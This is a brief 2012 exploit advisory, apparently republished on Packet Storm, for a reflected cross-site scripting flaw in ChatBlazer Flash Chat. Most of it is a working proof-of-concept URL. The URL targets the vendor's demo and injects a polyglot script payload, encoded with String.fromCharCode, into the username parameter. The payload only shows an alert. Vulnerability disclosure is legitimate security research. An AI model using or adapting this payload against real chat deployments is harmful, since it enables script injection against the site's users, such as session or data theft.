ChatBlazer Flash Chat suffers from a cross site scripting vulnerability.
2863706204b0d4e44dce1eef5246375180b128da4fdfce31ea95394d82592837# Exploit Title: ChatBlazer Flash Chat Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: www.chatblazer.com/
# Web Browser : Mozilla Firefox
# Blog : https://st2tea.blogspot.com
# PoC:
https://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
.................................................................
Well, we have cross site scripting in ChatBlazer.
We can use Demo. (simple example)
https://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0
https://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s1600/chat.JPG
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed